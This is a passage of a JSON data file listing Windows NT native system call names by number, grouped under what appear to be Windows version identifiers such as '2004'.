\"127\": \"NtAlpcDeleteResourceReserve\", \"128\": \"NtAlpcDeleteSectionView\", \"129\": \"NtAlpcDeleteSecurityContext\", \"130\": \"NtAlpcDisconnectPort\", \"131\": \"NtAlpcImpersonateClientContainerOfPort\", \"132\": \"NtAlpcImpersonateClientOfPort\", \"133\": \"NtAlpcOpenSenderProcess\", \"134\": \"NtAlpcOpenSenderThread\", \"135\": \"NtAlpcQueryInformation\", \"136\": \"NtAlpcQueryInformationMessage\", \"137\": \"NtAlpcRevokeSecurityContext\", \"138\": \"NtAlpcSendWaitReceivePort\", \"139\": \"NtAlpcSetInformation\", \"140\": \"NtAreMappedFilesTheSame\", \"141\": \"NtAssignProcessToJobObject\", \"142\": \"NtAssociateWaitCompletionPacket\", \"143\": \"NtCallEnclave\", \"144\": \"NtCancelIoFileEx\", \"145\": \"NtCancelSynchronousIoFile\", \"146\": \"NtCancelTimer2\", \"147\": \"NtCancelWaitCompletionPacket\", \"148\": \"NtCommitComplete\", \"149\": \"NtCommitEnlistment\", \"150\": \"NtCommitRegistryTransaction\", \"151\": \"NtCommitTransaction\", \"152\": \"NtCompactKeys\", \"153\": \"NtCompareObjects\", \"154\": \"NtCompareSigningLevels\", \"155\": \"NtCompareTokens\", \"156\": \"NtCompleteConnectPort\", \"157\": \"NtCompressKey\", \"158\": \"NtConnectPort\", \"159\": \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\", \"160\": \"NtCreateCrossVmEvent\", \"161\": \"NtCreateDebugObject\", \"162\": \"NtCreateDirectoryObject\", \"163\": \"NtCreateDirectoryObjectEx\", \"164\": \"NtCreateEnclave\", \"165\": \"NtCreateEnlistment\", \"166\": \"NtCreateEventPair\", \"167\": \"NtCreateIRTimer\", \"168\": \"NtCreateIoCompletion\", \"169\": \"NtCreateJobObject\", \"170\": \"NtCreateJobSet\", \"171\": \"NtCreateKeyTransacted\", \"172\": \"NtCreateKeyedEvent\", \"173\": \"NtCreateLowBoxToken\", \"174\": \"NtCreateMailslotFile\", \"175\": \"NtCreateMutant\", \"176\": \"NtCreateNamedPipeFile\", \"177\": \"NtCreatePagingFile\", \"178\": \"NtCreatePartition\", \"179\": \"NtCreatePort\", \"180\": \"NtCreatePrivateNamespace\", \"181\": \"NtCreateProcess\", \"182\": \"NtCreateProfile\", \"183\": \"NtCreateProfileEx\", \"184\": \"NtCreateRegistryTransaction\", \"185\": \"NtCreateResourceManager\", \"186\": \"NtCreateSectionEx\", \"187\": \"NtCreateSemaphore\", \"188\": \"NtCreateSymbolicLinkObject\", \"189\": \"NtCreateThreadEx\", \"190\": \"NtCreateTimer\", \"191\": \"NtCreateTimer2\", \"192\": \"NtCreateToken\", \"193\": \"NtCreateTokenEx\", \"194\": \"NtCreateTransaction\", \"195\": \"NtCreateTransactionManager\", \"196\": \"NtCreateUserProcess\", \"197\": \"NtCreateWaitCompletionPacket\", \"198\": \"NtCreateWaitablePort\", \"199\": \"NtCreateWnfStateName\", \"200\": \"NtCreateWorkerFactory\", \"201\": \"NtDebugActiveProcess\", \"202\": \"NtDebugContinue\", \"203\": \"NtDeleteAtom\", \"204\": \"NtDeleteBootEntry\", \"205\": \"NtDeleteDriverEntry\", \"206\": \"NtDeleteFile\", \"207\": \"NtDeleteKey\", \"208\": \"NtDeleteObjectAuditAlarm\", \"209\": \"NtDeletePrivateNamespace\", \"210\": \"NtDeleteValueKey\", \"211\": \"NtDeleteWnfStateData\", \"212\": \"NtDeleteWnfStateName\", \"213\": \"NtDisableLastKnownGood\", \"214\": \"NtDisplayString\", \"215\": \"NtDrawText\", \"216\": \"NtEnableLastKnownGood\", \"217\": \"NtEnumerateBootEntries\", \"218\": \"NtEnumerateDriverEntries\", \"219\": \"NtEnumerateSystemEnvironmentValuesEx\", \"220\": \"NtEnumerateTransactionObject\", \"221\": \"NtExtendSection\", \"222\": \"NtFilterBootOption\", \"223\": \"NtFilterToken\", \"224\": \"NtFilterTokenEx\", \"225\": \"NtFlushBuffersFileEx\", \"226\": \"NtFlushInstallUILanguage\", \"227\": \"NtFlushInstructionCache\", \"228\": \"NtFlushKey\", \"229\": \"NtFlushProcessWriteBuffers\", \"230\": \"NtFlushVirtualMemory\", \"231\": \"NtFlushWriteBuffer\", \"232\": \"NtFreeUserPhysicalPages\", \"233\": \"NtFreezeRegistry\", \"234\": \"NtFreezeTransactions\", \"235\": \"NtGetCachedSigningLevel\", \"236\": \"NtGetCompleteWnfStateSubscription\", \"237\": \"NtGetContextThread\", \"238\": \"NtGetCurrentProcessorNumber\", \"239\": \"NtGetCurrentProcessorNumberEx\", \"240\": \"NtGetDevicePowerState\", \"241\": \"NtGetMUIRegistryInfo\", \"242\": \"NtGetNextProcess\", \"243\": \"NtGetNextThread\", \"244\": \"NtGetNlsSectionPtr\", \"245\": \"NtGetNotificationResourceManager\", \"246\": \"NtGetWriteWatch\", \"247\": \"NtImpersonateAnonymousToken\", \"248\": \"NtImpersonateThread\", \"249\": \"NtInitializeEnclave\", \"250\": \"NtInitializeNlsFiles\", \"251\": \"NtInitializeRegistry\", \"252\": \"NtInitiatePowerAction\", \"253\": \"NtIsSystemResumeAutomatic\", \"254\": \"NtIsUILanguageComitted\", \"255\": \"NtListenPort\", \"256\": \"NtLoadDriver\", \"257\": \"NtLoadEnclaveData\", \"258\": \"NtLoadKey\", \"259\": \"NtLoadKey2\", \"260\": \"NtLoadKeyEx\", \"261\": \"NtLockFile\", \"262\": \"NtLockProductActivationKeys\", \"263\": \"NtLockRegistryKey\", \"264\": \"NtLockVirtualMemory\", \"265\": \"NtMakePermanentObject\", \"266\": \"NtMakeTemporaryObject\", \"267\": \"NtManageHotPatch\", \"268\": \"NtManagePartition\", \"269\": \"NtMapCMFModule\", \"270\": \"NtMapUserPhysicalPages\", \"271\": \"NtMapViewOfSectionEx\", \"272\": \"NtModifyBootEntry\", \"273\": \"NtModifyDriverEntry\", \"274\": \"NtNotifyChangeDirectoryFile\", \"275\": \"NtNotifyChangeDirectoryFileEx\", \"276\": \"NtNotifyChangeKey\", \"277\": \"NtNotifyChangeMultipleKeys\", \"278\": \"NtNotifyChangeSession\", \"279\": \"NtOpenEnlistment\", \"280\": \"NtOpenEventPair\", \"281\": \"NtOpenIoCompletion\", \"282\": \"NtOpenJobObject\", \"283\": \"NtOpenKeyEx\", \"284\": \"NtOpenKeyTransacted\", \"285\": \"NtOpenKeyTransactedEx\", \"286\": \"NtOpenKeyedEvent\", \"287\": \"NtOpenMutant\", \"288\": \"NtOpenObjectAuditAlarm\", \"289\": \"NtOpenPartition\", \"290\": \"NtOpenPrivateNamespace\", \"291\": \"NtOpenProcessToken\", \"292\": \"NtOpenRegistryTransaction\", \"293\": \"NtOpenResourceManager\", \"294\": \"NtOpenSemaphore\", \"295\": \"NtOpenSession\", \"296\": \"NtOpenSymbolicLinkObject\", \"297\": \"NtOpenThread\", \"298\": \"NtOpenTimer\", \"299\": \"NtOpenTransaction\", \"300\": \"NtOpenTransactionManager\", \"301\": \"NtPlugPlayControl\", \"302\": \"NtPrePrepareComplete\", \"303\": \"NtPrePrepareEnlistment\", \"304\": \"NtPrepareComplete\", \"305\": \"NtPrepareEnlistment\", \"306\": \"NtPrivilegeCheck\", \"307\": \"NtPrivilegeObjectAuditAlarm\", \"308\": \"NtPrivilegedServiceAuditAlarm\", \"309\": \"NtPropagationComplete\", \"310\": \"NtPropagationFailed\", \"311\": \"NtPulseEvent\", \"312\": \"NtQueryAuxiliaryCounterFrequency\", \"313\": \"NtQueryBootEntryOrder\", \"314\": \"NtQueryBootOptions\", \"315\": \"NtQueryDebugFilterState\", \"316\": \"NtQueryDirectoryFileEx\", \"317\": \"NtQueryDirectoryObject\", \"318\": \"NtQueryDriverEntryOrder\", \"319\": \"NtQueryEaFile\", \"320\": \"NtQueryFullAttributesFile\", \"321\": \"NtQueryInformationAtom\", \"322\": \"NtQueryInformationByName\", \"323\": \"NtQueryInformationEnlistment\", \"324\": \"NtQueryInformationJobObject\", \"325\": \"NtQueryInformationPort\", \"326\": \"NtQueryInformationResourceManager\", \"327\": \"NtQueryInformationTransaction\", \"328\": \"NtQueryInformationTransactionManager\", \"329\": \"NtQueryInformationWorkerFactory\", \"330\": \"NtQueryInstallUILanguage\", \"331\": \"NtQueryIntervalProfile\", \"332\": \"NtQueryIoCompletion\", \"333\": \"NtQueryLicenseValue\", \"334\": \"NtQueryMultipleValueKey\", \"335\": \"NtQueryMutant\", \"336\": \"NtQueryOpenSubKeys\", \"337\": \"NtQueryOpenSubKeysEx\", \"338\": \"NtQueryPortInformationProcess\", \"339\": \"NtQueryQuotaInformationFile\", \"340\": \"NtQuerySecurityAttributesToken\", \"341\": \"NtQuerySecurityObject\", \"342\": \"NtQuerySecurityPolicy\", \"343\": \"NtQuerySemaphore\", \"344\": \"NtQuerySymbolicLinkObject\", \"345\": \"NtQuerySystemEnvironmentValue\", \"346\": \"NtQuerySystemEnvironmentValueEx\", \"347\": \"NtQuerySystemInformationEx\", \"348\": \"NtQueryTimerResolution\", \"349\": \"NtQueryWnfStateData\", \"350\": \"NtQueryWnfStateNameInformation\", \"351\": \"NtQueueApcThreadEx\", \"352\": \"NtRaiseException\", \"353\": \"NtRaiseHardError\", \"354\": \"NtReadOnlyEnlistment\", \"355\": \"NtRecoverEnlistment\", \"356\": \"NtRecoverResourceManager\", \"357\": \"NtRecoverTransactionManager\", \"358\": \"NtRegisterProtocolAddressInformation\", \"359\": \"NtRegisterThreadTerminatePort\", \"360\": \"NtReleaseKeyedEvent\", \"361\": \"NtReleaseWorkerFactoryWorker\", \"362\": \"NtRemoveIoCompletionEx\", \"363\": \"NtRemoveProcessDebug\", \"364\": \"NtRenameKey\", \"365\": \"NtRenameTransactionManager\", \"366\": \"NtReplaceKey\", \"367\": \"NtReplacePartitionUnit\", \"368\": \"NtReplyWaitReplyPort\", \"369\": \"NtRequestPort\", \"370\": \"NtResetEvent\", \"371\": \"NtResetWriteWatch\", \"372\": \"NtRestoreKey\", \"373\": \"NtResumeProcess\", \"374\": \"NtRevertContainerImpersonation\", \"375\": \"NtRollbackComplete\", \"376\": \"NtRollbackEnlistment\", \"377\": \"NtRollbackRegistryTransaction\", \"378\": \"NtRollbackTransaction\", \"379\": \"NtRollforwardTransactionManager\", \"380\": \"NtSaveKey\", \"381\": \"NtSaveKeyEx\", \"382\": \"NtSaveMergedKeys\", \"383\": \"NtSecureConnectPort\", \"384\": \"NtSerializeBoot\", \"385\": \"NtSetBootEntryOrder\", \"386\": \"NtSetBootOptions\", \"387\": \"NtSetCachedSigningLevel\", \"388\": \"NtSetCachedSigningLevel2\", \"389\": \"NtSetContextThread\", \"390\": \"NtSetDebugFilterState\", \"391\": \"NtSetDefaultHardErrorPort\", \"392\": \"NtSetDefaultLocale\", \"393\": \"NtSetDefaultUILanguage\", \"394\": \"NtSetDriverEntryOrder\", \"395\": \"NtSetEaFile\", \"396\": \"NtSetHighEventPair\", \"397\": \"NtSetHighWaitLowEventPair\", \"398\": \"NtSetIRTimer\", \"399\": \"NtSetInformationDebugObject\", \"400\": \"NtSetInformationEnlistment\", \"401\": \"NtSetInformationJobObject\", \"402\": \"NtSetInformationKey\", \"403\": \"NtSetInformationResourceManager\", \"404\": \"NtSetInformationSymbolicLink\", \"405\": \"NtSetInformationToken\", \"406\": \"NtSetInformationTransaction\", \"407\": \"NtSetInformationTransactionManager\", \"408\": \"NtSetInformationVirtualMemory\", \"409\": \"NtSetInformationWorkerFactory\", \"410\": \"NtSetIntervalProfile\", \"411\": \"NtSetIoCompletion\", \"412\": \"NtSetIoCompletionEx\", \"413\": \"NtSetLdtEntries\", \"414\": \"NtSetLowEventPair\", \"415\": \"NtSetLowWaitHighEventPair\", \"416\": \"NtSetQuotaInformationFile\", \"417\": \"NtSetSecurityObject\", \"418\": \"NtSetSystemEnvironmentValue\", \"419\": \"NtSetSystemEnvironmentValueEx\", \"420\": \"NtSetSystemInformation\", \"421\": \"NtSetSystemPowerState\", \"422\": \"NtSetSystemTime\", \"423\": \"NtSetThreadExecutionState\", \"424\": \"NtSetTimer2\", \"425\": \"NtSetTimerEx\", \"426\": \"NtSetTimerResolution\", \"427\": \"NtSetUuidSeed\", \"428\": \"NtSetVolumeInformationFile\", \"429\": \"NtSetWnfProcessNotificationEvent\", \"430\": \"NtShutdownSystem\", \"431\": \"NtShutdownWorkerFactory\", \"432\": \"NtSignalAndWaitForSingleObject\", \"433\": \"NtSinglePhaseReject\", \"434\": \"NtStartProfile\", \"435\": \"NtStopProfile\", \"436\": \"NtSubscribeWnfStateChange\", \"437\": \"NtSuspendProcess\", \"438\": \"NtSuspendThread\", \"439\": \"NtSystemDebugControl\", \"440\": \"NtTerminateEnclave\", \"441\": \"NtTerminateJobObject\", \"442\": \"NtTestAlert\", \"443\": \"NtThawRegistry\", \"444\": \"NtThawTransactions\", \"445\": \"NtTraceControl\", \"446\": \"NtTranslateFilePath\", \"447\": \"NtUmsThreadYield\", \"448\": \"NtUnloadDriver\", \"449\": \"NtUnloadKey\", \"450\": \"NtUnloadKey2\", \"451\": \"NtUnloadKeyEx\", \"452\": \"NtUnlockFile\", \"453\": \"NtUnlockVirtualMemory\", \"454\": \"NtUnmapViewOfSectionEx\", \"455\": \"NtUnsubscribeWnfStateChange\", \"456\": \"NtUpdateWnfStateData\", \"457\": \"NtVdmControl\", \"458\": \"NtWaitForAlertByThreadId\", \"459\": \"NtWaitForDebugEvent\", \"460\": \"NtWaitForKeyedEvent\", \"461\": \"NtWaitForWorkViaWorkerFactory\", \"462\": \"NtWaitHighEventPair\", \"463\": \"NtWaitLowEventPair\"}, \"2004\": {\"0\": \"NtAccessCheck\", \"1\": \"NtWorkerFactoryWorkerReady\", \"2\": \"NtAcceptConnectPort\", \"3\": \"NtMapUserPhysicalPagesScatter\", \"4\": \"NtWaitForSingleObject\", \"5\": \"NtCallbackReturn\", \"6\": \"NtReadFile\", \"7\": \"NtDeviceIoControlFile\", \"8\": \"NtWriteFile\", \"9\": \"NtRemoveIoCompletion\", \"10\": \"NtReleaseSemaphore\", \"11\": \"NtReplyWaitReceivePort\", \"12\": \"NtReplyPort\", \"13\": \"NtSetInformationThread\", \"14\": \"NtSetEvent\", \"15\": \"NtClose\", \"16\": \"NtQueryObject\", \"17\": \"NtQueryInformationFile\", \"18\": \"NtOpenKey\", \"19\": \"NtEnumerateValueKey\", \"20\": \"NtFindAtom\", \"21\": \"NtQueryDefaultLocale\", \"22\": \"NtQueryKey\", \"23\": \"NtQueryValueKey\", \"24\": \"NtAllocateVirtualMemory\", \"25\": \"NtQueryInformationProcess\", \"26\": \"NtWaitForMultipleObjects32\", \"27\": \"NtWriteFileGather\", \"28\": \"NtSetInformationProcess\", \"29\": \"NtCreateKey\", \"30\": \"NtFreeVirtualMemory\", \"31\": \"NtImpersonateClientOfPort\", \"32\": \"NtReleaseMutant\", \"33\": \"NtQueryInformationToken\", \"34\": \"NtRequestWaitReplyPort\", \"35\": \"NtQueryVirtualMemory\", \"36\": \"NtOpenThreadToken\", \"37\": \"NtQueryInformationThread\", \"38\": \"NtOpenProcess\", \"39\": \"NtSetInformationFile\", \"40\": \"NtMapViewOfSection\", \"41\": \"NtAccessCheckAndAuditAlarm\", \"42\": \"NtUnmapViewOfSection\", \"43\": \"NtReplyWaitReceivePortEx\", \"44\": \"NtTerminateProcess\", \"45\": \"NtSetEventBoostPriority\", \"46\": \"NtReadFileScatter\", \"47\": \"NtOpenThreadTokenEx\", \"48\": \"NtOpenProcessTokenEx\", \"49\": \"NtQueryPerformanceCounter\", \"50\": \"NtEnumerateKey\", \"51\": \"NtOpenFile\", \"52\": \"NtDelayExecution\", \"53\": \"NtQueryDirectoryFile\", \"54\": \"NtQuerySystemInformation\", \"55\": \"NtOpenSection\", \"56\": \"NtQueryTimer\", \"57\": \"NtFsControlFile\", \"58\": \"NtWriteVirtualMemory\", \"59\": \"NtCloseObjectAuditAlarm\", \"60\": \"NtDuplicateObject\", \"61\": \"NtQueryAttributesFile\", \"62\": \"NtClearEvent\", \"63\": \"NtReadVirtualMemory\", \"64\": \"NtOpenEvent\", \"65\": \"NtAdjustPrivilegesToken\", \"66\": \"NtDuplicateToken\", \"67\": \"NtContinue\", \"68\": \"NtQueryDefaultUILanguage\", \"69\": \"NtQueueApcThread\", \"70\": \"NtYieldExecution\", \"71\": \"NtAddAtom\", \"72\": \"NtCreateEvent\", \"73\": \"NtQueryVolumeInformationFile\", \"74\": \"NtCreateSection\", \"75\": \"NtFlushBuffersFile\", \"76\": \"NtApphelpCacheControl\", \"77\": \"NtCreateProcessEx\", \"78\": \"NtCreateThread\", \"79\": \"NtIsProcessInJob\", \"80\": \"NtProtectVirtualMemory\", \"81\": \"NtQuerySection\", \"82\": \"NtResumeThread\", \"83\": \"NtTerminateThread\", \"84\": \"NtReadRequestData\", \"85\": \"NtCreateFile\", \"86\": \"NtQueryEvent\", \"87\": \"NtWriteRequestData\", \"88\": \"NtOpenDirectoryObject\", \"89\": \"NtAccessCheckByTypeAndAuditAlarm\", \"90\": \"NtQuerySystemTime\", \"91\": \"NtWaitForMultipleObjects\", \"92\": \"NtSetInformationObject\", \"93\": \"NtCancelIoFile\", \"94\": \"NtTraceEvent\", \"95\": \"NtPowerInformation\", \"96\": \"NtSetValueKey\", \"97\": \"NtCancelTimer\", \"98\": \"NtSetTimer\", \"99\": \"NtAccessCheckByType\", \"100\": \"NtAccessCheckByTypeResultList\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"102\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"103\": \"NtAcquireCrossVmMutant\", \"104\": \"NtAcquireProcessActivityReference\", \"105\": \"NtAddAtomEx\", \"106\": \"NtAddBootEntry\", \"107\": \"NtAddDriverEntry\", \"108\": \"NtAdjustGroupsToken\", \"109\": \"NtAdjustTokenClaimsAndDeviceGroups\", \"110\": \"NtAlertResumeThread\", \"111\": \"NtAlertThread\", \"112\": \"NtAlertThreadByThreadId\", \"113\": \"NtAllocateLocallyUniqueId\", \"114\": \"NtAllocateReserveObject\", \"115\": \"NtAllocateUserPhysicalPages\", \"116\": \"NtAllocateUserPhysicalPagesEx\", \"117\": \"NtAllocateUuids\", \"118\": \"NtAllocateVirtualMemoryEx\", \"119\": \"NtAlpcAcceptConnectPort\", \"120\": \"NtAlpcCancelMessage\", \"121\": \"NtAlpcConnectPort\", \"122\": \"NtAlpcConnectPortEx\", \"123\": \"NtAlpcCreatePort\", \"124\": \"NtAlpcCreatePortSection\", \"125\": \"NtAlpcCreateResourceReserve\", \"126\": \"NtAlpcCreateSectionView\", \"127\": \"NtAlpcCreateSecurityContext\", \"128\": \"NtAlpcDeletePortSection\", \"129\": \"NtAlpcDeleteResourceReserve\", \"130\": \"NtAlpcDeleteSectionView\", \"131\": \"NtAlpcDeleteSecurityContext\", \"132\": \"NtAlpcDisconnectPort\", \"133\": \"NtAlpcImpersonateClientContainerOfPort\", \"134\": \"NtAlpcImpersonateClientOfPort\", \"135\": \"NtAlpcOpenSenderProcess\", \"136\": \"NtAlpcOpenSenderThread\", \"137\": \"NtAlpcQueryInformation\", \"138\": \"NtAlpcQueryInformationMessage\", \"139\": \"NtAlpcRevokeSecurityContext\", \"140\": \"NtAlpcSendWaitReceivePort\", \"141\": \"NtAlpcSetInformation\", \"142\": \"NtAreMappedFilesTheSame\", \"143\": \"NtAssignProcessToJobObject\", \"144\": \"NtAssociateWaitCompletionPacket\", \"145\": \"NtCallEnclave\", \"146\": \"NtCancelIoFileEx\", \"147\": \"NtCancelSynchronousIoFile\", \"148\": \"NtCancelTimer2\", \"149\": \"NtCancelWaitCompletionPacket\", \"150\": \"NtCommitComplete\", \"151\": \"NtCommitEnlistment\", \"152\": \"NtCommitRegistryTransaction\", \"153\": \"NtCommitTransaction\", \"154\": \"NtCompactKeys\", \"155\": \"NtCompareObjects\", \"156\": \"NtCompareSigningLevels\", \"157\": \"NtCompareTokens\", \"158\": \"NtCompleteConnectPort\", \"159\": \"NtCompressKey\", \"160\": \"NtConnectPort\", \"161\": \"NtContinueEx\", \"162\": \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\", \"163\": \"NtCreateCrossVmEvent\", \"164\": \"NtCreateCrossVmMutant\", \"165\": \"NtCreateDebugObject\", \"166\": \"NtCreateDirectoryObject\", \"167\": \"NtCreateDirectoryObjectEx\", \"168\": \"NtCreateEnclave\", \"169\": \"NtCreateEnlistment\", \"170\": \"NtCreateEventPair\", \"171\": \"NtCreateIRTimer\", \"172\": \"NtCreateIoCompletion\", \"173\": \"NtCreateJobObject\", \"174\": \"NtCreateJobSet\", \"175\": \"NtCreateKeyTransacted\", \"176\": \"NtCreateKeyedEvent\", \"177\": \"NtCreateLowBoxToken\", \"178\": \"NtCreateMailslotFile\", \"179\": \"NtCreateMutant\", \"180\": \"NtCreateNamedPipeFile\", \"181\": \"NtCreatePagingFile\", \"182\": \"NtCreatePartition\", \"183\": \"NtCreatePort\", \"184\": \"NtCreatePrivateNamespace\", \"185\": \"NtCreateProcess\", \"186\": \"NtCreateProfile\", \"187\": \"NtCreateProfileEx\", \"188\": \"NtCreateRegistryTransaction\", \"189\": \"NtCreateResourceManager\", \"190\": \"NtCreateSectionEx\", \"191\": \"NtCreateSemaphore\", \"192\": \"NtCreateSymbolicLinkObject\", \"193\": \"NtCreateThreadEx\", \"194\": \"NtCreateTimer\", \"195\": \"NtCreateTimer2\", \"196\": \"NtCreateToken\", \"197\": \"NtCreateTokenEx\", \"198\": \"NtCreateTransaction\", \"199\": \"NtCreateTransactionManager\", \"200\": \"NtCreateUserProcess\", \"201\": \"NtCreateWaitCompletionPacket\", \"202\": \"NtCreateWaitablePort\", \"203\": \"NtCreateWnfStateName\", \"204\": \"NtCreateWorkerFactory\", \"205\": \"NtDebugActiveProcess\", \"206\": \"NtDebugContinue\", \"207\": \"NtDeleteAtom\", \"208\": \"NtDeleteBootEntry\", \"209\": \"NtDeleteDriverEntry\", \"210\": \"NtDeleteFile\", \"211\": \"NtDeleteKey\", \"212\": \"NtDeleteObjectAuditAlarm\", \"213\": \"NtDeletePrivateNamespace\", \"214\": \"NtDeleteValueKey\", \"215\": \"NtDeleteWnfStateData\", \"216\": \"NtDeleteWnfStateName\", \"217\": \"NtDirectGraphicsCall\", \"218\": \"NtDisableLastKnownGood\", \"219\": \"NtDisplayString\", \"220\": \"NtDrawText\", \"221\": \"NtEnableLastKnownGood\", \"222\": \"NtEnumerateBootEntries\", \"223\": \"NtEnumerateDriverEntries\", \"224\": \"NtEnumerateSystemEnvironmentValuesEx\", \"225\": \"NtEnumerateTransactionObject\", \"226\": \"NtExtendSection\", \"227\": \"NtFilterBootOption\", \"228\": \"NtFilterToken\", \"229\": \"NtFilterTokenEx\", \"230\": \"NtFlushBuffersFileEx\", \"231\": \"NtFlushInstallUILanguage\", \"232\": \"NtFlushInstructionCache\", \"233\": \"NtFlushKey\", \"234\": \"NtFlushProcessWriteBuffers\", \"235\": \"NtFlushVirtualMemory\", \"236\": \"NtFlushWriteBuffer\", \"237\": \"NtFreeUserPhysicalPages\", \"238\": \"NtFreezeRegistry\", \"239\": \"NtFreezeTransactions\", \"240\": \"NtGetCachedSigningLevel\", \"241\": \"NtGetCompleteWnfStateSubscription\", \"242\": \"NtGetContextThread\", \"243\": \"NtGetCurrentProcessorNumber\", \"244\": \"NtGetCurrentProcessorNumberEx\", \"245\": \"NtGetDevicePowerState\", \"246\": \"NtGetMUIRegistryInfo\", \"247\": \"NtGetNextProcess\", \"248\": \"NtGetNextThread\", \"249\": \"NtGetNlsSectionPtr\", \"250\": \"NtGetNotificationResourceManager\", \"251\": \"NtGetWriteWatch\", \"252\": \"NtImpersonateAnonymousToken\", \"253\": \"NtImpersonateThread\", \"254\": \"NtInitializeEnclave\", \"255\": \"NtInitializeNlsFiles\", \"256\": \"NtInitializeRegistry\", \"257\": \"NtInitiatePowerAction\", \"258\": \"NtIsSystemResumeAutomatic\", \"259\": \"NtIsUILanguageComitted\", \"260\": \"NtListenPort\", \"261\": \"NtLoadDriver\", \"262\": \"NtLoadEnclaveData\", \"263\": \"NtLoadKey\", \"264\": \"NtLoadKey2\", \"265\": \"NtLoadKeyEx\", \"266\": \"NtLockFile\", \"267\": \"NtLockProductActivationKeys\", \"268\": \"NtLockRegistryKey\", \"269\": \"NtLockVirtualMemory\", \"270\": \"NtMakePermanentObject\", \"271\": \"NtMakeTemporaryObject\", \"272\": \"NtManageHotPatch\", \"273\": \"NtManagePartition\", \"274\": \"NtMapCMFModule\", \"275\": \"NtMapUserPhysicalPages\", \"276\": \"NtMapViewOfSectionEx\", \"277\": \"NtModifyBootEntry\", \"278\": \"NtModifyDriverEntry\", \"279\": \"NtNotifyChangeDirectoryFile\", \"280\": \"NtNotifyChangeDirectoryFileEx\", \"281\": \"NtNotifyChangeKey\", \"282\": \"NtNotifyChangeMultipleKeys\", \"283\": \"NtNotifyChangeSession\", \"284\": \"NtOpenEnlistment\", \"285\": \"NtOpenEventPair\", \"286\": \"NtOpenIoCompletion\", \"287\": \"NtOpenJobObject\", \"288\": \"NtOpenKeyEx\", \"289\": \"NtOpenKeyTransacted\", \"290\": \"NtOpenKeyTransactedEx\", \"291\": \"NtOpenKeyedEvent\", \"292\": \"NtOpenMutant\", \"293\": \"NtOpenObjectAuditAlarm\", \"294\": \"NtOpenPartition\", \"295\": \"NtOpenPrivateNamespace\", \"296\": \"NtOpenProcessToken\", \"297\": \"NtOpenRegistryTransaction\", \"298\": \"NtOpenResourceManager\", \"299\": \"NtOpenSemaphore\", \"300\": \"NtOpenSession\", \"301\": \"NtOpenSymbolicLinkObject\", \"302\": \"NtOpenThread\", \"303\": \"NtOpenTimer\", \"304\": \"NtOpenTransaction\", \"305\": \"NtOpenTransactionManager\", \"306\": \"NtPlugPlayControl\", \"307\": \"NtPrePrepareComplete\", \"308\": \"NtPrePrepareEnlistment\", \"309\": \"NtPrepareComplete\", \"310\": \"NtPrepareEnlistment\", \"311\": \"NtPrivilegeCheck\", \"312\": \"NtPrivilegeObjectAuditAlarm\", \"313\": \"NtPrivilegedServiceAuditAlarm\", \"314\": \"NtPropagationComplete\", \"315\": \"NtPropagationFailed\", \"316\": \"NtPssCaptureVaSpaceBulk\", \"317\": \"NtPulseEvent\", \"318\": \"NtQueryAuxiliaryCounterFrequency\", \"319\": \"NtQueryBootEntryOrder\", \"320\": \"NtQueryBootOptions\", \"321\": \"NtQueryDebugFilterState\", \"322\": \"NtQueryDirectoryFileEx\", \"323\": \"NtQueryDirectoryObject\", \"324\": \"NtQueryDriverEntryOrder\", \"325\": \"NtQueryEaFile\", \"326\": \"NtQueryFullAttributesFile\", \"327\": \"NtQueryInformationAtom\", \"328\": \"NtQueryInformationByName\", \"329\": \"NtQueryInformationEnlistment\", \"330\": \"NtQueryInformationJobObject\", \"331\": \"NtQueryInformationPort\", \"332\": \"NtQueryInformationResourceManager\", \"333\": \"NtQueryInformationTransaction\", \"334\": \"NtQueryInformationTransactionManager\", \"335\": \"NtQueryInformationWorkerFactory\", \"336\": \"NtQueryInstallUILanguage\", \"337\": \"NtQueryIntervalProfile\", \"338\": \"NtQueryIoCompletion\", \"339\": \"NtQueryLicenseValue\", \"340\": \"NtQueryMultipleValueKey\", \"341\": \"NtQueryMutant\", \"342\": \"NtQueryOpenSubKeys\", \"343\": \"NtQueryOpenSubKeysEx\", \"344\": \"NtQueryPortInformationProcess\", \"345\": \"NtQueryQuotaInformationFile\", \"346\": \"NtQuerySecurityAttributesToken\", \"347\": \"NtQuerySecurityObject\", \"348\": \"NtQuerySecurityPolicy\", \"349\": \"NtQuerySemaphore\", \"350\": \"NtQuerySymbolicLinkObject\", \"351\": \"NtQuerySystemEnvironmentValue\", \"352\": \"NtQuerySystemEnvironmentValueEx\", \"353\": \"NtQuerySystemInformationEx\", \"354\": \"NtQueryTimerResolution\", \"355\": \"NtQueryWnfStateData\", \"356\": \"NtQueryWnfStateNameInformation\", \"357\": \"NtQueueApcThreadEx\", \"358\": \"NtRaiseException\", \"359\": \"NtRaiseHardError\", \"360\": \"NtReadOnlyEnlistment\", \"361\": \"NtRecoverEnlistment\", \"362\": \"NtRecoverResourceManager\", \"363\": \"NtRecoverTransactionManager\", \"364\": \"NtRegisterProtocolAddressInformation\", \"365\": \"NtRegisterThreadTerminatePort\", \"366\": \"NtReleaseKeyedEvent\", \"367\": \"NtReleaseWorkerFactoryWorker\", \"368\": \"NtRemoveIoCompletionEx\", \"369\": \"NtRemoveProcessDebug\", \"370\": \"NtRenameKey\", \"371\": \"NtRenameTransactionManager\", \"372\": \"NtReplaceKey\", \"373\": \"NtReplacePartitionUnit\", \"374\": \"NtReplyWaitReplyPort\", \"375\": \"NtRequestPort\", \"376\": \"NtResetEvent\", \"377\": \"NtResetWriteWatch\", \"378\": \"NtRestoreKey\", \"379\": \"NtResumeProcess\", \"380\": \"NtRevertContainerImpersonation\", \"381\": \"NtRollbackComplete\", \"382\": \"NtRollbackEnlistment\", \"383\": \"NtRollbackRegistryTransaction\", \"384\": \"NtRollbackTransaction\", \"385\": \"NtRollforwardTransactionManager\", \"386\": \"NtSaveKey\", \"387\": \"NtSaveKeyEx\", \"388\": \"NtSaveMergedKeys\", \"389\": \"NtSecureConnectPort\", \"390\": \"NtSerializeBoot\", \"391\": \"NtSetBootEntryOrder\", \"392\": \"NtSetBootOptions\", \"393\": \"NtSetCachedSigningLevel\", \"394\": \"NtSetCachedSigningLevel2\", \"395\": \"NtSetContextThread\", \"396\": \"NtSetDebugFilterState\", \"397\": \"NtSetDefaultHardErrorPort\", \"398\": \"NtSetDefaultLocale\", \"399\": \"NtSetDefaultUILanguage\", \"400\": 